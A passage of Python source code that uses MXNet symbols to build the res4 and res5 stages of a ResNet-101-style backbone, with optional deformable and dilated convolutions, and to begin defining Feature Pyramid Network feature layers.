pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2b = bn4b11_branch2b
res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=scale4b11_branch2b,
act_type='relu')
res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2c = bn4b11_branch2c
res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu, scale4b11_branch2c])
res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11, act_type='relu')
res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2a = bn4b12_branch2a
res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=scale4b12_branch2a,
act_type='relu')
res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2b = bn4b12_branch2b
res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=scale4b12_branch2b,
act_type='relu')
res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2c = bn4b12_branch2c
res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu, scale4b12_branch2c])
res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12, act_type='relu')
res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2a = bn4b13_branch2a
res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=scale4b13_branch2a,
act_type='relu')
res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2b = bn4b13_branch2b
res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=scale4b13_branch2b,
act_type='relu')
res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2c = bn4b13_branch2c
res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu, scale4b13_branch2c])
res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13, act_type='relu')
res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2a = bn4b14_branch2a
res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=scale4b14_branch2a,
act_type='relu')
res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2b = bn4b14_branch2b
res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=scale4b14_branch2b,
act_type='relu')
res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2c = bn4b14_branch2c
res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu, scale4b14_branch2c])
res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14, act_type='relu')
res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2a = bn4b15_branch2a
res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=scale4b15_branch2a,
act_type='relu')
res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2b = bn4b15_branch2b
res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=scale4b15_branch2b,
act_type='relu')
res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2c = bn4b15_branch2c
res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu, scale4b15_branch2c])
res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15, act_type='relu')
res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2a = bn4b16_branch2a
res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=scale4b16_branch2a,
act_type='relu')
res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2b = bn4b16_branch2b
res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=scale4b16_branch2b,
act_type='relu')
res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', data=res4b16_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2c = bn4b16_branch2c
res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu, scale4b16_branch2c])
res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16, act_type='relu')
res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2a = bn4b17_branch2a
res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=scale4b17_branch2a,
act_type='relu')
res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2b = bn4b17_branch2b
res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=scale4b17_branch2b,
act_type='relu')
res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2c = bn4b17_branch2c
res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu, scale4b17_branch2c])
res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17, act_type='relu')
res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2a = bn4b18_branch2a
res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=scale4b18_branch2a,
act_type='relu')
res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2b = bn4b18_branch2b
res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=scale4b18_branch2b,
act_type='relu')
res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2c = bn4b18_branch2c
res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu, scale4b18_branch2c])
res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18, act_type='relu')
res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2a = bn4b19_branch2a
res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', data=scale4b19_branch2a,
act_type='relu')
res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2b = bn4b19_branch2b
res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=scale4b19_branch2b,
act_type='relu')
res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2c = bn4b19_branch2c
res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu, scale4b19_branch2c])
res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19, act_type='relu')
res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2a = bn4b20_branch2a
res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', data=scale4b20_branch2a,
act_type='relu')
res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2b = bn4b20_branch2b
res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=scale4b20_branch2b,
act_type='relu')
res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2c = bn4b20_branch2c
res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu, scale4b20_branch2c])
res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20, act_type='relu')
res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2a = bn4b21_branch2a
res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=scale4b21_branch2a,
act_type='relu')
res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2b = bn4b21_branch2b
res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=scale4b21_branch2b,
act_type='relu')
res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b21_branch2c = mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2c = bn4b21_branch2c
res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu, scale4b21_branch2c])
res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21, act_type='relu')
res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2a = bn4b22_branch2a
res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=scale4b22_branch2a,
act_type='relu')
if with_dpyramid:
res4b22_branch2b_offset = mx.symbol.Convolution(name='res4b22_branch2b_offset', data=res4b22_branch2a_relu,
num_filter=72, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
res4b22_branch2b = mx.contrib.symbol.DeformableConvolution(name='res4b22_branch2b', data=res4b22_branch2a_relu,
offset=res4b22_branch2b_offset,
num_filter=256, pad=(1, 1), kernel=(3, 3),
num_deformable_group=4,
stride=(1, 1), no_bias=True)
else:
res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2b = bn4b22_branch2b
res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=scale4b22_branch2b,
act_type='relu')
res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2c = bn4b22_branch2c
res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu, scale4b22_branch2c])
res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22, act_type='relu')
if with_dilated:
res5_stride = (1, 1)
res5_dilate = (2, 2)
else:
res5_stride = (2, 2)
res5_dilate = (1, 1)
# res5a-bottleneck
res5a_branch2a = mx.symbol.Convolution(name='res5a_branch2a', data=res4b22_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=res5_stride, no_bias=True)
bn5a_branch2a = mx.symbol.BatchNorm(name='bn5a_branch2a', data=res5a_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2a = bn5a_branch2a
res5a_branch2a_relu = mx.symbol.Activation(name='res5a_branch2a_relu', data=scale5a_branch2a, act_type='relu')
if with_dconv:
res5a_branch2b_offset = mx.symbol.Convolution(name='res5a_branch2b_offset', data=res5a_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5a_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5a_branch2b', data=res5a_branch2a_relu, offset=res5a_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, stride=(1, 1), dilate=res5_dilate, no_bias=True)
else:
res5a_branch2b = mx.symbol.Convolution(name='res5a_branch2b', data=res5a_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5a_branch2b = mx.symbol.BatchNorm(name='bn5a_branch2b', data=res5a_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2b = bn5a_branch2b
res5a_branch2b_relu = mx.symbol.Activation(name='res5a_branch2b_relu', data=scale5a_branch2b, act_type='relu')
res5a_branch2c = mx.symbol.Convolution(name='res5a_branch2c', data=res5a_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5a_branch2c = mx.symbol.BatchNorm(name='bn5a_branch2c', data=res5a_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2c = bn5a_branch2c
# res5a-shortcut
res5a_branch1 = mx.symbol.Convolution(name='res5a_branch1', data=res4b22_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=res5_stride, no_bias=True)
bn5a_branch1 = mx.symbol.BatchNorm(name='bn5a_branch1', data=res5a_branch1, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch1 = bn5a_branch1
res5a = mx.symbol.broadcast_add(name='res5a', *[scale5a_branch1, scale5a_branch2c])
res5a_relu = mx.symbol.Activation(name='res5a_relu', data=res5a, act_type='relu')
# res5b-bottleneck
res5b_branch2a = mx.symbol.Convolution(name='res5b_branch2a', data=res5a_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5b_branch2a = mx.symbol.BatchNorm(name='bn5b_branch2a', data=res5b_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2a = bn5b_branch2a
res5b_branch2a_relu = mx.symbol.Activation(name='res5b_branch2a_relu', data=scale5b_branch2a, act_type='relu')
if with_dconv:
res5b_branch2b_offset = mx.symbol.Convolution(name='res5b_branch2b_offset', data=res5b_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5b_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5b_branch2b', data=res5b_branch2a_relu, offset=res5b_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, dilate=res5_dilate, no_bias=True)
else:
res5b_branch2b = mx.symbol.Convolution(name='res5b_branch2b', data=res5b_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5b_branch2b = mx.symbol.BatchNorm(name='bn5b_branch2b', data=res5b_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2b = bn5b_branch2b
res5b_branch2b_relu = mx.symbol.Activation(name='res5b_branch2b_relu', data=scale5b_branch2b, act_type='relu')
res5b_branch2c = mx.symbol.Convolution(name='res5b_branch2c', data=res5b_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5b_branch2c = mx.symbol.BatchNorm(name='bn5b_branch2c', data=res5b_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2c = bn5b_branch2c
# res5b-shortcut
res5b = mx.symbol.broadcast_add(name='res5b', *[res5a_relu, scale5b_branch2c])
res5b_relu = mx.symbol.Activation(name='res5b_relu', data=res5b, act_type='relu')
# res5c-bottleneck
res5c_branch2a = mx.symbol.Convolution(name='res5c_branch2a', data=res5b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5c_branch2a = mx.symbol.BatchNorm(name='bn5c_branch2a', data=res5c_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale5c_branch2a = bn5c_branch2a
res5c_branch2a_relu = mx.symbol.Activation(name='res5c_branch2a_relu', data=scale5c_branch2a, act_type='relu')
if with_dconv:
res5c_branch2b_offset = mx.symbol.Convolution(name='res5c_branch2b_offset', data=res5c_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5c_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5c_branch2b', data=res5c_branch2a_relu, offset=res5c_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, dilate=res5_dilate, no_bias=True)
else:
res5c_branch2b = mx.symbol.Convolution(name='res5c_branch2b', data=res5c_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5c_branch2b = mx.symbol.BatchNorm(name='bn5c_branch2b', data=res5c_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5c_branch2b = bn5c_branch2b
res5c_branch2b_relu = mx.symbol.Activation(name='res5c_branch2b_relu', data=scale5c_branch2b, act_type='relu')
res5c_branch2c = mx.symbol.Convolution(name='res5c_branch2c', data=res5c_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5c_branch2c = mx.symbol.BatchNorm(name='bn5c_branch2c', data=res5c_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5c_branch2c = bn5c_branch2c
# res5c-shortcut
res5c = mx.symbol.broadcast_add(name='res5c', *[res5b_relu, scale5c_branch2c])
res5c_relu = mx.symbol.Activation(name='res5c_relu', data=res5c, act_type='relu')
return data, conv1_relu, res2c_relu, res3b3_relu, res4b22_relu, res5c_relu
def get_fpn_feature(self, c0, c1, c2, c3, c4, c5, feature_dim=256):
# lateral connection
fpn_p5_1x1 = mx.symbol.Convolution(data=c5, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p5_1x1')
fpn_p4_1x1 = mx.symbol.Convolution(data=c4, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p4_1x1')
fpn_p3_1x1 = mx.symbol.Convolution(data=c3, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p3_1x1')
fpn_p2_1x1 = mx.symbol.Convolution(data=c2, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p2_1x1')
fpn_p1_1x1 = mx.symbol.Convolution(data=c1, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p1_1x1')
fpn_p0_1x1 = mx.symbol.Convolution(data=c0, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p0_1x1')
# top-down connection
fpn_p5_upsample = mx.symbol.UpSampling(fpn_p5_1x1, scale=2, sample_type='nearest', name='fpn_p5_upsample')
fpn_p4_plus = mx.sym.ElementWiseSum(*[fpn_p5_upsample, fpn_p4_1x1], name='fpn_p4_sum')
fpn_p4_upsample = mx.symbol.UpSampling(fpn_p4_plus, scale=2, sample_type='nearest', name='fpn_p4_upsample')
fpn_p3_plus = mx.sym.ElementWiseSum(*[fpn_p4_upsample, fpn_p3_1x1], name='fpn_p3_sum')
fpn_p3_upsample = mx.symbol.UpSampling(fpn_p3_plus, scale=2, sample_type='nearest', name='fpn_p3_upsample')
fpn_p2_plus = mx.sym.ElementWiseSum(*[fpn_p3_upsample, fpn_p2_1x1], name='fpn_p2_sum')
fpn_p2_upsample = mx.symbol.UpSampling(fpn_p2_plus, scale=2, sample_type='nearest', name='fpn_p2_upsample')
fpn_p1_plus = mx.sym.ElementWiseSum(*[fpn_p2_upsample, fpn_p1_1x1], name='fpn_p1_sum')
fpn_p1_upsample = mx.symbol.UpSampling(fpn_p1_plus, scale=2, sample_type='nearest', name='fpn_p1_upsample')
fpn_p0_plus = mx.sym.ElementWiseSum(*[fpn_p1_upsample, fpn_p0_1x1], name='fpn_p0_sum')
# FPN feature
fpn_p6 = mx.sym.Convolution(data=c5, kernel=(3, 3), pad=(1, 1), stride=(2, 2), num_filter=feature_dim, name='fpn_p6')
'''
fpn_p5 = mx.symbol.Convolution(data=fpn_p5_1x1, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p5')
fpn_p4 = mx.symbol.Convolution(data=fpn_p4_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p4')
fpn_p3 = mx.symbol.Convolution(data=fpn_p3_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p3')
fpn_p2 = mx.symbol.Convolution(data=fpn_p2_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p2')
fpn_p1 = mx.symbol.Convolution(data=fpn_p1_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p1')
'''
fpn_p0 = mx.symbol.Convolution(data=fpn_p0_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p0')
#return fpn_p0, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5, fpn_p6
return fpn_p0,fpn_p6
def get_fpn_feature1(self, c0, c1, c2, c3, c4, c5, feature_dim=128):
eps = 1e-5
# lateral connection
fpn_p5_1x1 = mx.symbol.Convolution(data=c5, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p5_1x1')
bn_fpn_p5_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p5_1x1', data=fpn_p5_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p5_1x1_relu = mx.symbol.Activation(name='bn_fpn_p5_1x1_relu', data=bn_fpn_p5_1x1, act_type='relu')
fpn_p4_1x1 = mx.symbol.Convolution(data=c4, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p4_1x1')
bn_fpn_p4_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p4_1x1', data=fpn_p4_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p4_1x1_relu = mx.symbol.Activation(name='bn_fpn_p4_1x1_relu', data=bn_fpn_p4_1x1, act_type='relu')
